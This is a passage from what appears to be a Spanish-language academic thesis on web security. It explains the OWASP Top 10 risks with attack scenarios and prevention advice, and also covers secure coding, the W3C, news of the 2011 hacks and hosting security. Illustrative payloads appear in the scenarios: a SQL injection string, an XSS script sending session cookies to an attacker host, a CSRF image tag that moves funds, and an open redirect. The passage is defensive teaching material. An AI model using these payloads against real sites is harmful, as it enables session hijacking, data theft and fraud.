víctima autenticada a enviar una petición HTTP falsificado, incluyendo la sesión
del usuario y cualquier otra información de autenticación incluida
automáticamente, a una aplicación web vulnerable. Esto permite al atacante
forzar al navegador de la victima para generar pedidos que la aplicación
vulnerable piensa son peticiones legítimas provenientes de la víctima.
A6 - Security Misconfiguration (Defectuosa configuración de seguridad):
Una buena seguridad requiere tener definida e implementada una configuración
segura para la aplicación, marcos de trabajo, servidor de aplicación, servidor
web, base de datos, y plataforma. Todas estas configuraciones deben ser
definidas, implementadas, y mantenidas ya que por lo general no son seguras
por defecto. Esto incluye mantener todo el software actualizado, incluidas las
librerías de código utilizadas por la aplicación.
A7 - Insecure Cryptographic Storage (Almacenamiento Criptográfico
Inseguro): Muchas aplicaciones web no protegen adecuadamente los datos
sensibles, tales como tarjetas de crédito, NSSs, y credenciales de autenticación
con mecanismos de cifrado o hashing. Atacantes pueden modificar o robar
tales datos protegidos inadecuadamente para conducir robos de identidad,
fraudes de tarjeta de crédito u otros crímenes.
A8 - Failure to Restrict URL Access (Falla de Restricción de Acceso a
URL): Muchas aplicaciones web verifican los privilegios de acceso a URLs
antes de generar enlaces o botones protegidos. Sin embargo, las aplicaciones
necesitan realizar controles similares cada vez que estas páginas son
accedidas, o los atacantes podrán falsificar URLs para acceder a estas páginas
igualmente.
72
A9 - Insufficient Transport Layer Protection (Protección Insuficiente en la
capa de Transporte): Las aplicaciones frecuentemente fallan al autenticar,
cifrar, y proteger la confidencialidad e integridad de tráfico de red sensible.
Cuando esto ocurre, es debido a la utilización de algoritmos débiles,
certificados expirados, inválidos, o sencillamente no utilizados correctamente.
A10 - Unvalidated Redirect and Forwards (Redirecciones y Reenvíos no
validados): Las aplicaciones web frecuentemente redirigen y reenvían a los
usuarios hacia otras páginas o sitios web, y utilizan datos no confiables para
determinar la página de destino. Sin una validación apropiada, los atacantes
pueden redirigir a las víctimas hacia sitios de phishing o malware, o utilizar
reenvíos para acceder páginas no autorizadas.
73
A1 - Injections (Inyecciones)
A2 - Cross-Site Scripting (XSS) (Secuencia de comandos en sitios
cruzados (xss))
74
A3 - Broken Authentication and Session Management (Pérdida de
Autenticación Gestión de Sesiones)
A4 - Insecure Direct Object References (Referencia Directa Insegura a
Objetos)
75
A5 - Cross-Site Request Forgery (CSRF) (Falsificación de Peticiones en
Sitios Cruzados (CRSF))
A6 - Security Misconfiguration (Defectuosa configuración de seguridad)
76
A7 - Insecure Cryptographic Storage (Almacenamiento Criptográfico
Inseguro)
A8 - Failure to Restrict URL Access (Falla de Restricción de Acceso a
URL)
77
A9 - Insufficient Transport Layer Protection (Protección Insuficiente en la
capa de Transporte)
A10 - Unvalidated Redirect and Forwards (Redirecciones y Reenvíos no
validados)
78
4.4 - Ejemplos y prevención de ataques.
Los ataques mencionados en el sub capitulo anterior pueden ser evitado si se
previenen estas vulnerabilidades, mostramos un ejemplo del escenario del
ataque y los métodos recomendados por la OWASP según el ataque para
lograr prevenirlo.
A1 - Injections (Inyecciones)
Ejemplos de escenarios de ataque
La aplicación utiliza datos no confiables en la construcción de la siguiente
consulta vulnerable SQL:
String query = "SELECT * FROM accounts WHERE
custID='" + request.getParameter("id") +"'";
El atacante modifica el parámetro „id‟ en su navegador para enviar: ' or '1'='1.
Esto cambia el significado de la consulta devolviendo todos los registros de la
tabla ACCOUNTS en lugar de solo el cliente solicitado.
http://example.com/app/accountView?id=' or '1'='1
En el peor caso, el atacante utiliza esta vulnerabilidad para invocar
procedimientos almacenados especiales en la base de datos que permiten la
toma de posesión de la base de datos y posiblemente también al servidor que
aloja la misma.
79
Prevenir la inyección requiere mantener los datos no confiables
separados de comandos y consultas.
1. La opción preferida es utilizar una API segura que evite el uso del intérprete
completamente o provea una interface parametrizada. Sea cuidadoso con
APIs, tales como procedimientos almacenados, que son parametrizados, pero
que aun pueden introducir inyección implícitamente.
2. Si una API parametrizada no se encuentra disponible, usted debe
cuidadosamente escapar los caracteres especiales utilizando una sintaxis de
escape especial para dicho intérprete.
3. Una validación positiva de entradas con una apropiada canonicalización es
también recomendado, pero no es una defensa completa ya que muchas
aplicaciones requieren caracteres especiales en sus entradas.
A2 - Cross-Site Scripting (XSS) (Secuencia de comandos en sitios
cruzados (xss))
Ejemplos de escenarios de ataque
La aplicación utiliza datos no confiables en la construcción del siguiente
código HTML sin validar o escapar los datos:
(String) page += "<input name='creditcard' type='TEXT„
value='" + request.getParameter("CC") + "'>";
80
El atacante modifica el parámetro „CC‟ en el navegador:
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
Esto causa que el identificador de sesión de la victima sea enviado al sitio web
del atacante, permitiendo al atacante secuestrar la sesión actual del usuario.
Notar que los atacantes pueden también utilizar XSS para anular cualquier
defensa CSRF que la aplicación pueda utilizar. Ver A5 para información sobre
CSRF.
Prevenir XSS requiere mantener los datos no confiables separados
del contenido activo del navegador.
1. La opción preferida es escapar todos los datos no confiables basados en el
contexto HTML (cuerpo, atributo, JavaScript, CSS, o URL) donde los mismos
serán ubicados. Los desarrolladores necesitan incluir esta técnica en sus
aplicaciones al menos que el marco UI lo realice por ellos.
2. Una validación de entradas positiva o “whitelist” con apropiada
canonicalización y decodificación es también recomendable ya que ayuda a
proteger contra XSS, pero no es una defensa completa ya que muchas
aplicaciones requieren caracteres especiales en sus entradas. Tal validación
debería, tanto como sea posible, decodificar cualquier entrada codificada, y
81
luego validar la longitud, caracteres, formato, y cualquier regla de negocio en
dichos datos antes de aceptar la entrada.
A3 - Broken Authentication and Session Management (Pérdida de
Autenticación Gestión de Sesiones)
Ejemplos de escenarios de ataque
Escenario #1: Aplicación de reserva de vuelos que soporta re-escritura de
direcciones URL poniendo los identificadores de sesión en la propia dirección:
http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPS
KHCJUN2JV?dest=Hawaii
Un usuario autenticado en el sitio quiere mostrar la venta a sus amigos. Envía
por correo electrónico el enlace anterior, sin ser consciente de que está
proporcionando su identificador de sesión. Cuando sus amigos utilicen el
anterior enlace utilizarán su sesión y su tarjeta de crédito.
Escenario #2: No se establecen correctamente los tiempos de desconexión en
la aplicación. Un usuario utiliza un ordenador público para acceder al sitio. En
lugar de utilizar la función de “Cerrar sesión”, cierra la pestaña del navegador y
se marcha. Un atacante utiliza el mismo navegador al cabo de una hora, y ese
navegador todavía se encuentra autenticado.
Escenario #3: Un atacante de dentro de la organización, o externo, consigue
acceder a la base de datos de contraseñas del sistema. Las contraseñas de los
82
usuarios no se encuentran cifradas, mostrando todas las contraseñas en claro
al atacante.
La recomendación principal para una organización es facilitar a los
desarrolladores:
1. Un único conjunto de controles de autenticación fuerte y gestión de
sesiones. Dichos controles deberán conseguir:
a) Reunir todos los requisitos de gestión de sesiones y autenticación
definidos en el Application Security Verification Standard (ASVS) de OWASP,
secciones V2 (Autenticación) y V3 (Gestión de sesiones).
b) Tener un interfaz simple para los desarrolladores.
Considerar ESAPI Authenticator y las APIs de usuario como buenos ejemplos a
emular, utilizar o sobre los que partir.
2. Se debe hacer especial hincapié en evitar vulnerabilidades de XSS que
podrían ser utilizadas para robar identificadores de sesión. Consultar el
apartado A2.
A4 - Insecure Direct Object References (Referencia Directa Insegura a
Objetos)
Ejemplos de escenarios de ataque
83
La aplicación utiliza datos no verificados en una llamada SQL que accede a
información sobre la cuenta:
String query = "SELECT * FROM accts WHERE account = ?";
PreparedStatement pstmt =
connection.prepareStatement(query , … );
pstmt.setString( 1, request.getparameter("acct"));
ResultSet results = pstmt.executeQuery( );
El atacante simplemente modificaría el parámetro “acct” en su navegador para
enviar cualquier número de cuenta que quiera. Si esta acción no se verifica, el
atacante podría acceder a cualquier cuenta de usuario, en vez de a su cuenta
de cliente correspondiente.
http://example.com/app/accountInfo?acct=notmyacct
Prevenir referencias inseguras a objetos directos requiere
seleccionar una manera de proteger los objetos accesibles por
cada usuario (por ejemplo, identificadores de objeto, nombres de
fichero):
1. Utilizar referencias indirectas por usuario o sesión. Esto evitaría que
los atacantes accedieren directamente a recursos no autorizados. Por
84
ejemplo, en vez de utilizar la clave del recurso de base de datos, se
podría utilizar una lista de 6 recursos que utilizase los números del 1 al 6
para indicar cuál es el valor elegido por el usuario. La aplicación tendría
que realizar la correlación entre la referencia indirecta con la clave de la
base de datos correspondiente en el servidor. ESAPI de OWASP incluye
relaciones tanto secuenciales como aleatorias de referencias de acceso
que los desarrolladores pueden utilizar para eliminar las referencias
directas a objetos.
2. Comprobar el acceso. Cada uso de una referencia directa a un objeto
de una fuente que no es de confianza debe incluir una comprobación de
control de acceso para asegurar que el usuario está autorizado a
acceder al objeto solicitado.
A5 - Cross-Site Request Forgery (CSRF) (Falsificacion de Peticiones en
Sitios Cruzados (CRSF))
Ejemplos de escenarios de ataque
La aplicación permite que los usuarios envíen peticiones de cambio de estado,
que no incluyen nada secreto. Por ejemplo:
http://example.com/app/transferFunds?amount=1500&destinationAccount
=4673243243
85
El atacante puede construir una petición que transfiera dinero desde la cuenta
de la víctima a su propia cuenta. Podrá insertar su ataque dentro de una
etiqueta de imagen en un sitio web, o iframe, que esté bajo su control y al que
la víctima se podrá dirigir.
<img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“width="0" height="0"
/>
Cuando la víctima visite el sitio, en lugar de cargarse la imagen, se realizará la
petición HTTP falsificada. Si la víctima previamente había adquirido privilegios
entonces el ataque será exitoso.
Para prevenir la CSFR se necesita incluir un testigo no predecible
en el cuerpo, o URL, de cada petición HTTP. Dicho testigo debe ser,
como mínimo, único por cada sesión de usuario.
1. La opción preferida es incluir el testigo en un campo oculto. Esto genera
que el valor sea enviado en el cuerpo de la petición HTTP evitando su
inclusión en la URL, lo cual está sujeto a una mayor exposición.
2. El testigo único también puede ser incluido en la URL misma, o en un
parámetro de la URL. Sin embargo, este enfoque presenta el riesgo que
la URL sea expuesta a un atacante, y por lo tanto exponiendo al testigo.
86
El Guardián CSRF de la OWASP, puede ser utilizado para incluir
automáticamente los testigos en aplicaciones Java EE, .NET o PHP. La API ES
de la OWASP, incluye generadores y validadores de testigos que los
realizadores de software pueden usar para proteger sus transacciones.
A6 - Security Misconfiguration (Defectuosa configuración de seguridad)
Ejemplos de escenarios de ataque
Escenario #1: La aplicación está basada en un ambiente de trabajo como
Struts o Spring. Se han presentado defectos de XSS en algunos de los
componentes que utiliza la aplicación. Se ha liberado una actualización que
sirve para corregir esos defectos. Hasta que no se realicen dichas
actualizaciones, los atacantes podrán encontrar y explotar los fallos, ahora
conocidos, de la aplicación.
Escenario #2: La consola de administración del servidor de aplicaciones está
instalada y no ha sido removida. Las cuentas predeterminadas no han sido
cambiadas. Los atacantes descubren que las páginas de administración están
activas, se registran con las claves predeterminadas y toman posesión de los
servicios.
Escenario #3: El listado del contenido de los directorios no está deshabilitado
en el servidor. Los atacantes descubren que pueden encontrar cualquier
archivo simplemente consultando el listado de los directorios. Los atacantes
87
encuentran y descargan las clases java compiladas. Dichas clases son
desensambladas por ingeniería reversa para obtener su código. A partir de
un análisis del código se pueden detectar defectos en el control de acceso de
la aplicación.
Escenario #4. La configuración del servidor de aplicaciones permite que los
mensajes de la pila sean retornados a los usuarios. Eso potencialmente expone
defectos en la aplicación. Los atacantes adoran la información de error que
dichos mensajes proveen.
Las principales recomendaciones se enfocan en establecer lo
siguiente:
1. Un proceso repetible que permita configurar, rápida y fácilmente,
entornos asegurados. Los entornos de desarrollo, pruebas y producción
deben estar configurados de la misma forma. Este proceso debe ser
automatizado para minimizar el esfuerzo requerido en la configuración
de un nuevo entorno.
2. Un proceso para mantener y desplegar todas actualizaciones y parches
de software de manera oportuna. Este proceso debe seguirse en cada
uno de los ambientes de trabajo. Es necesario que se incluya las
actualizaciones de todas las bibliotecas de código.
88
3. Una arquitectura robusta de la aplicación que provea una buena
separación y seguridad entre los componentes.
4. Considerar la realización periódica de exploraciones (scan) y auditorias
para ayudar a detectar fallos en la configuración o parches faltantes.
A7 - Insecure Cryptographic Storage (Almacenamiento Criptografico
Inseguro)
Ejemplos de escenarios de ataque
Escenario #1: Una aplicación cifra las tarjetas de crédito en la base de datos
para prevenir que los datos sean expuestos a los usuarios finales. Sin
embargo, la base de datos descifra automáticamente las columnas de las
tarjetas de crédito, permitiendo que una vulnerabilidad de inyección de SQL
pueda extraer las tarjetas de crédito en texto plano. El sistema debería haberse
configurado de manera que solo las aplicaciones del back-end pudieran
descifrar los
datos, no la capa frontal de la aplicación web.
Escenario #2: Una cinta de backup almacena datos médicos cifrados pero la
clave en cifrado se encuentra en el mismo backup. La cinta nunca llega al
centro de copias de seguridad.
89
Escenario #3: La base de datos de contraseñas usa hashes sin sal para
almacenar las contraseñas de todos los usuarios. Una vulnerabilidad en la
subida de ficheros permite a un atacante obtener el fichero de contraseñas.
Todos los hashes sin sal se pueden romper en 4 semanas, mientras que los
hashes con sal llevarías más de 3000 años.
El listado de todos los peligros del cifrado inseguro está fuera del
alcance de este documento. Sin embargo, para todos los datos
sensibles que requieran cifrado, haga como mínimo lo siguiente:
1. Considere las amenazas que afecten a sus datos y de las cuales se
quiera proteger (por ejemplo, ataques internos, usuarios externos) y
asegúrese de que todos los datos están cifrados de manera que se
defienda de las amenazas.
2. Asegúrese de que las copias de seguridad almacenadas externamente
están cifradas, pero las claves son gestionadas y almacenadas de forma
separada.
3. Asegúrese del uso adecuado de algoritmos estándares robustos, que las
claves usadas son fuertes y que existe una gestión de claves adecuada.
4. Asegúrese de que sus contraseñas se almacenan en forma de hash con
un algoritmo estándar robusto y con sal.
5. Asegúrese de que todas las claves y contraseñas son protegidas contra
acceso no autorizado.
90
A8 - Failure to Restrict URL Access (Falla de Restricción de Acceso a
URL)
Ejemplos de escenarios de ataque
El atacante simplemente navega forzosamente a la URL objetivo. Considere las
siguientes URLs las cuales se supone que requieren autenticación. Para
acceder a la página “admin_getappInfo” se necesitan permisos de
administrador.
http://ejemplo.com/app/getappInfo
http://ejemplo.com/app/admin_getappInfo
Si un atacante no autenticado puede acceder a cualquiera de estas páginas
entonces se ha permitido acceso no autorizado. Si un usuario autorizado, no
administrador, puede acceder a la página “admin_getappInfo”, esto es un fallo,
y puede llevar al atacante a otras páginas de administración que no están
debidamente protegidas.
Este tipo de vulnerabilidades se encuentran con frecuencia cuando links y
botones simplemente se ocultan a usuario no autorizados, pero la aplicación no
protege adecuadamente las páginas de destino.
Prevenir el acceso no autorizado a URLs requiere planificar un
método que requiera autenticación y autorización adecuadas para
cada página. Frecuentemente, dicha protección viene dada por uno
91
o más componentes externos al código de la aplicación. Con
independencia del mecanismo o mecanismos se recomienda:
1. La autenticación y autorización estén basadas en roles, para minimizar
el esfuerzo necesario para mantener estas políticas.
2. Las políticas deberían ser configurables, para minimizar cualquier
aspecto embebido en la política.
3. La implementación del mecanismo debería negar todo acceso por
defecto, requiriendo el establecimiento explícito de permisos a usuarios
y roles específicos por cada página.
4. Si la pagina forma parte de un proceso de varios pasos, verifique que las
condiciones de la misma se encuentren en el estado apropiado para
permitir el acceso.
A9 - Insufficient Transport Layer Protection (Proteccion Insuficiente en la
capa de Transporte)
Escenario #1: Una aplicación no utiliza SSL para todas las páginas que
requieren autenticación. El atacante simplemente captura el tráfico de red (por
ejemplo, a través de una red inalámbrica abierta o un sistema vecino de su red
cableada), y observa la cookie de sesión de una víctima autenticada.
92
Escenario #2: Una aplicación utiliza un certificado SSL configurado
incorrectamente, lo que provoca que el navegador muestre advertencias a sus
usuarios. Los usuarios tienen que aceptar dichas advertencias y continuar para
poder acceder a la aplicación. Esto hace que los usuarios se acostumbren a
estos avisos. Un ataque de phishing contra la aplicación atrae los clientes a
otra aplicación de apariencia similar a la original que no dispone de un
certificado válido, lo que genera advertencias similares en el navegador. Como
las víctimas se encuentran acostumbradas a dichas advertencias, proceden a
acceder al sitio de phishing facilitando contraseñas u otra información sensible.
Escenario #3: Una aplicación simplemente utiliza ODBC/JDBC para la conexión
con la base de datos, sin darse cuenta de que todo el tráfico se transmite en
claro.
Proporcionar una protección adecuada a la capa de transporte
puede afectar al diseño de la aplicación. De esta forma, resulta más
fácil requerir SSL para la aplicación completa. Por razones de
rendimiento, algunas aplicaciones utilizan SSL únicamente para
acceder a páginas privadas. Otras, utilizan SSL sólo en páginas
“críticas”, pero esto puede exponer identificadores de sesión y otra
información sensible. Como mínimo, se debería aplicar lo siguiente:
1. Requerir SSL para todas las páginas sensibles. Las peticiones sin SSL a
estas páginas deben ser redirigidas a las páginas con SSL.
93
2. Establecer el atributo “secure” en todas las cookies sensibles.
3. Configurar el servidor SSL para que acepte únicamente algoritmos
considerados fuertes (por ejemplo, que cumpla FIPS 140-2).
4. Verificar que el certificado sea válido, no se encuentre expirado o
revocado y que se ajuste a todos los dominios utilizados por la
aplicación.
5. Conexiones a sistemas finales (back-end) y otros sistemas también
deben utilizar SSL u otras tecnologías de cifrado.
A10 - Unvalidated Redirect and Forwards (Redirecciones y Reenvíos no
validados)
Ejemplos de Escenarios de Ataque
Escenario #1: La aplicación tiene una página llamada “redirect.jsp” que
recibe un único parámetro llamado “url”. El atacante compone una URL
maliciosa que redirige a los usuarios a una aplicación que realiza el phishing e
instala código malicioso.
http://www.example.com/redirect.jsp?url=evil.com
Escenario #2: La aplicación utiliza destinos para redirigir las peticiones
entre distintas
94
partes de la aplicación. Para facilitar esto, algunas páginas utilizan un
parámetro para indicar dónde será dirigido el usuario si la transacción es
correcta. En este caso, el atacante compone una URL que evadirá el control de
acceso de la aplicación y llevará al atacante a una función de
administración a la que en una situación habitual no debería tener acceso.
http://www.example.com/boring.jsp?fwd=admin.jsp
Puede realizarse un uso seguro de redirecciones y re-envíos de
varias maneras:
1. Simplemente, evitando el uso de redirecciones y reenvíos.
2. Si se utiliza, no involucrar parámetros manipulables por el usuario para
definir el destino. Generalmente, esto puede realizarse.
3. Si los parámetros de destino no pueden evitarse, asegúrese de que el
valor facilitado es válido y autorizado para el usuario. Se recomienda
que el valor de cualquier parámetro de destino sea un valor de mapeo,
en lugar de la dirección, o parte de la dirección, de la URL y en el código
del servidor traducir dicho valor a la dirección URL de destino. Las
aplicaciones pueden utilizar ESAPI para sobrescribir el método
“sendRedirect()” y asegurarse de que todos los destinos redirigidos son
seguros.
Evitar estos problemas resulta extremadamente importante ya que son un
blanco preferido por los phishers que intentan ganarse la confianza de los
usuarios.
95
4.4.1 - Mitigación de Riesgos
Mitigar los riesgos se puede definir como evitar alguna eventualidad que podría
imposibilitar una acción a un activo u objetivo. Mitigando riesgos podemos
brindar seguridad a nuestros sistemas, aplicaciones y portales web.
Las posibilidades de que una amenaza se materialice en riesgos es muy
común en estos tiempos donde la codificación carece de malas prácticas.
En los últimos meses es casi una costumbre ver en los medios de
comunicaciones noticias como:
1. Sony Pictures hacked by Lulz Security, 1,000,000 passwords claimed stolen
http://www.engadget.com/2011/06/02/sony-pictures-hacked-by-lulz-
security-1-000-000-passwords-claim/
Compañía que fue escenario de varios ataques a su portal web en el mes de
Junio. Ataques que tuvieron éxito por SQL Injection.
96
2. LulzSec continues rampage against PS3 maker by hitting music
division's servers; company says it is "looking into" new attack.
http://www.gamespot.com/news/6317404/hacker-group-hits-sony-
bmg?tag=other-user-related-content%3B1
97
3. Nintendo server hacked
http://www.gamespot.com/news/6317145/nintendo-server-hacked
98
4. Anonymous hackea 90 mil cuentas de los sistemas de defensa de EE.UU.
http://www.emol.com/noticias/tecnologia/2011/07/12/492115/anonymous
-hackea-90-mil-cuentas-de-los-sistemas-de-defensa-de-eeuu.html
99
5. Hackers robaron más de 24 mil archivos del Pentágono en marzo
http://www.emol.com/noticias/tecnologia/2011/07/14/492589/hackers-
robaron-mas-de-24-mil-archivos-del-pentagono-en-marzo.html
100
6. Piratas informáticos acceden a datos personales de soldados de
EE.UU
http://www.emol.com/noticias/tecnologia/2011/06/29/489832/piratas-
informaticos-acceden-a-datos-personales-de-soldados-de-eeuu.html
Solo por mencionar algunos de los ataques, la lista no concluye ahí, podemos encontrar
una lista en el portal http://www.emol.com/tag/223/hackers.html sobre los ataques
más recientes, por mencionar otros, vemos en su portal:
101
Sábado, 25 de Junio de 2011
Piratas informáticos LulzSec anuncian fin de su campaña de
“antiseguridad”
Durante 50 días, el grupo demostró la vulnerabilidad de sitios web como los de
la policía británica y la CIA.
Varias páginas de Internet del Gobierno peruano caen ante acción de
Anonymous Según la organización los ataques buscan defender "la libertad de
todos" y se realizan en rechazo al Acuerdo de Asociación Transpacífico.
Analistas afirman que Brasil está "vulnerable" a los ataques informáticos
Desde el miércoles, grupos de piratas informáticos vienen atacando las páginas
de la Presidencia, el Senado, los ministerios de Deporte y Cultura, entre otros.
Viernes, 24 de Junio de 2011
Hackers roban datos desde el sitio de la empresa de videojuegos
Electronic Arts
La compañía dijo que los atacantes no tuvieron acceso a información bancaria
de los usuarios, pero aclaró que pudieron haber robado otros datos
confidenciales.
102
Perú pide ayuda al FBI para investigar los ataques informáticos que
afectaron a sitios estatales
Entre las páginas que fueron atacadas están las de los Ministerios de Salud y
Energía, el Instituto Nacional Penitenciario y el servicio de Guardacostas.
Hackers publican datos confidenciales pertenecientes al estado de
Arizona
Entre los documentos divulgados hay informes de seguridad de distintas
agencias estatales, informes internos de planificación y hasta simples reportes
con incidentes de tráfico.
Hacker que robó información personal de 120 mil usuarios de iPad se
declara culpable
El ciber delincuente de 26 años, que podría pasar hasta 10 años en la cárcel,
admitió su culpabilidad a los cargos de fraude y piratería.
Miércoles, 22 de Junio de 2011
Brasil asegura que datos oficiales están a salvo tras sufrir violento ataque
informático
Los sitios del gobierno y la presidencia estuvieron varias horas fuera de servicio
durante la madrugada.
Miércoles, 22 de Junio de 2011
Hackers declaran la guerra a gobiernos y empresas
En los últimos meses los ataques a sistemas informáticos se han multiplicado,
por lo que varias naciones se han visto obligadas a crear instituciones
especializadas para enfrentar las amenazas.
103
Martes, 21 de Junio de 2011
Anonymous reacciona ante iniciativa que busca vigilar los comentarios
en las redes sociales
El nuevo plan del Gobierno contempla un constante monitoreo de los debates
que se generan en blogs, Facebook y Twitter, incluyendo la ubicación
geográfica de las personas que emiten los comentarios.
Hackers atacan el sitio web de la policía británica
Un portavoz de la agencia afectada dijo que la página web era puramente para
información pública y que los hackers no tuvieron acceso a datos o información
confidencial.
Más de la mitad de los ataques fueron realizados por el grupo Anonymous,
liderado por lo que se le conoce como Lulzsec, el cual a la actualidad cuenta
con 288,917 seguidores en la red social Twitter.
Estos fueron realizados con ataques como SQL injectios, Cross-Site Scripting
XSS y Metasploit.
104
4.5 - Programación segura.
La programación segura es una rama de la programación que estudia la
seguridad del código fuente de un software cuyo objetivo es encontrar y
solucionar los errores de software, esto incluye: Utilización de funciones
seguras para proteger de desbordamientos de pila, declaración segura de
estructuras de datos, control del trabajo con el flujo de datos, análisis profundo
de otros errores de software mediante testeos del software en ejecución y
creación de parches para los mismos, diseño de parches heurísticos y
metaheurísticos para proveer un cierto grado de seguridad proactiva, utilización
de criptografía y otros métodos para evitar que el software sea crackeado36.
4.5.1 - Uso de códigos obsoletos.
El uso de funciones obsoletas puede indicar el uso de negligencias en los
códigos.
Así como los lenguajes de programación evolucionan, las funciones en
ocasiones se vuelven obsoletas, debido a:
Los avances en el lenguaje de programación para una mejor compresión
de como las operaciones deben realizarse de manera eficaz y segura.
Cambios en las conversiones que gobiernan ciertas operaciones.
Algunas funciones que al ser removidas , son generalmente
reemplazadas por nuevas contra apartes que realizan la misma tarea de
formas diferentes y mejores aplicadas.
36
,31
http://es.wikipedia.org/wiki/Programaci%C3%B3n_segura
105
Referencias al la documentación de esta función con el fin de determinar
por qué está en desuso u obsoletos, y para aprender acerca de formas
alternativas de obtener la misma funcionalidad.37
4.5.1 - W3C.
Debido a que existen muchas formas programar, muchas formas de hacer sitos
web, muchas formas de implementar, herramientas, programas, entre otros.
Existe una organización encargada de regular todos los métodos para
programar correctamente en la web. Se trata de la W3C, cuyas siglas significan
se refirieren al Consorcio de la World Wide Web.
La W3C surgió en el 1 de octubre del 1994, y fue creada por Tim Berners - Lee
quien es considerado el padre de la Web. Berners creó URL (Uniform
Resource Locator o localizador uniforme de recursos), además inventó el HTTP
y el HTML. El CEO de la W3C es Dr. Jeffrey Jaffe.
La misión de la W3C es llevar a la World Wide Web a su máximo potencial,
desarrollando protocolos y guías que aseguren el crecimiento de la web a largo
tiempo38.
La W3C se encarga de ofrecerle al desarrollador web el material necesario
para desarrollar óptimamente un portal electrónico. En caso de el sitio ya esté
creado, puedes validar el nivel de calidad del código de tu sitio a través del
enlace http://validator.w3.org/ (ver imagen 4.5.1.1)
38
http://www.w3.org/Consortium/mission
106
Imagen 4.5.1.1: Validador código web de la W3C
La W3C a diferencia de otras empresas no cuenta con una estructura
organización convencional. Y es que es administrada en conjunto por tres
instituciones: MIT, ERCIM, KEIO UNIVERSITY. El equipo de trabajo que
trabajan desde una de estas instituciones, es liderado por el CEO y un Director.
Existen un grupo de documentaciones: “documentos de procesos de la W3C”,
“Acuerdo de miembros”, “Políticas de patentes” entre otros que determinan el
rol a seguir por cada uno de los responsables de crear los estándares de la
W3C.
La forma en la que la W3C recibe ingresos es a través de donaciones hechas
por individuos a través del programa de soporte de la W3C, Pagos que hacen
sus miembros y por fondos públicos y privados por concepto de
investigaciones39.
39
http://www.w3c.org
107
La W3C ofrece los siguientes estándares:
- Web Design and Applications:
Diseño Web y aplicaciones incluyen las normas para la construcción y la
renderización de páginas Web, incluyendo HTML5, CSS, SVG, Ajax y otras
tecnologías para aplicaciones Web ("WebsApps"). Esta sección también
incluye información sobre cómo hacer páginas accesibles a las personas con
discapacidad (WCAG), internacionalizado, y el trabajo en los dispositivos
móviles.
- Web Architecture
Arquitectura Web se centra en las tecnologías de base y los principios que
sustentan la Web, incluyendo los URI y HTTP.
- Semantic Web
Además de la clásica "documentación de la Web" La W3C está ayudando a
construir un grupo de tecnologías para apoyar una "Red de datos", el tipo de
datos que se encuentran en bases de datos. El objetivo último de la red de
datos es permitir que los ordenadores puedan hacer un trabajo más útil y
desarrollar sistemas que puedan apoyar las interacciones de confianza en la
red. El término "Web semántica" se refiere a la visión del W3C sobre la Web de
los datos vinculados. La tecnología de Web Semántica permite a las personas
crear almacenes de datos en la Web, crear vocabularios, y escribir las reglas
para el manejo de datos. Los datos vinculados se encuentran facultados por
tecnologías como RDF y SPARQL.
108
- XML Technology
Tecnologías XML, incluidos XML, XQuery, XML Schema, XSLT, XSL-FO,
Intercambio Eficiente de XML (EXI), y otras normas relacionadas.
- Web of Services
Web de Servicios se refiere al diseño basado en mensajes con frecuencia se
encuentran en la web y en software empresarial. La web de los Servicios se
basa en tecnologías tales como HTTP, XML, SOAP, WSDL, SPARQL, y otros
- Web of Devices
W3C se centra en las tecnologías que permitan el acceso Web en cualquier
momento, utilizando cualquier dispositivo. Esto incluye acceso a Internet desde
teléfonos móviles y otros dispositivos móviles, así como el uso de la tecnología
Web en electrónica de consumo, impresoras, televisión interactiva, e incluso
automóviles.
- Browsers and Authoring Tools
Los agentes de Web están destinados a servir a los usuarios. En esta sección
podrás encontrar información útil en el diseño de los navegadores y
herramientas de autoría, así como contra los robots de los buscadores,
agregadores, y motores de inferencia.
109
CAPÍTULO V:
SERVICIO DE HOSPEDAJE
110
CAPÍTULO V: SERVICIO DE HOSPEDAJE
5.1 – Introducción
Como es de conocimiento general, que la World Wide Web no existiría sin que
hubiese equipos que alojaran los archivos que componen los sitios web. Dichos
equipos muy superiores a las computadoras personales y de hogar, son
servidores que tienen la capacidad de aguantar la carga de procesos para
manejar miles de solicitudes por minutos que reciben por parte de los usuarios
que intentan entrar a un sitio web determinado.
Un portal o sitio web está compuesto por archivos que le dan vida a un sitio
determinado. Dichos archivos son accesados por los visitantes y el servidor se
encarga de gestionar los mismos a través un servidor Web o Web Hosting.
Según el manual de Hacking Webservers de la CEH (Certified Ethical Hacker)
(2011), en la actualidad existe alrededor de 200 millones de servidores web.
Comúnmente el cliente tiene la opción de elegir alojamiento en servidores con
sistemas operativos Windows (ISS) y Linux (Apache). Aunque existen otros
tipos de Servidores Web como: Lighttpd, Nginx y Google. (ver imagen 5.1.2)
111
Imagen 5.1.1: Proporciones del mercado de servidores Web
No se debe confundir el término alojamiento Web con servidor Web. El
alojamiento Web se refiere al servidor físico donde se guardan los archivos que
componen un sitio web. Un servidor Web no es más que un programa que
maneja información en forma bidireccional con el cliente, o sea que se
comunica con el cliente, y este ultimo ve dicha respuesta de su lado a través de
una aplicación40.
5.2 - Servicios de seguridad.
Dado que los ataques informáticos no son realizados solamente al usuario, sino
también al servidor, existen diversos servicios de seguridad ofrecidos por los
proveedores de alojamiento Web. Estos servicios garantizan o minimizan las
posibilidades de ataques tanto al servidor como al portal en sí.
40
http://es.wikipedia.org/wiki/Servidor_web
112
Aunque no existe un sitio web 100% impenetrable, existen medidas de
seguridad para mitigar o minimizar los ataques o riesgos a ser atacados. Un
ejemplo de ellos es portal Paypal.com un sitio dedicado a ofrecer servicios de
pago para portales de comercio electrónicos.
Este sitio posee una de las mejores defensas que un sitio puede tener (ver
imagen 5.2.1) y ha sido atacado incluso por el famoso grupo de Hackers
Anonymous en el 201041. Dicho ataque al que paginas como la de Visa.com y
Mastercard.com no pudieron contrarrestar el portal de paypal.com solo
funcionó un poco lento, pero el mismo nunca dejo e funcionar correctamente.
5.2.1 - Tipos de Servicios.
El alojamiento compartido o “shared hosting” ofrece niveles de seguridad
completos para sus clientes. Desde firewalls tanto físicos como a nivel de
software, backups, antivirus, anti spyware, entre otras medidas que garantizan
que los datos de dicho cliente no serán accesadas por un usuario no
autorizado.
Por otro lado, cuando el alojamiento es dedicado “dedicated server” entonces
cada servicio es visto realmente como un paquete o conjunto de opciones cuyo
propósito general es proteger la información tanto para el cliente como el
usuario final.
41
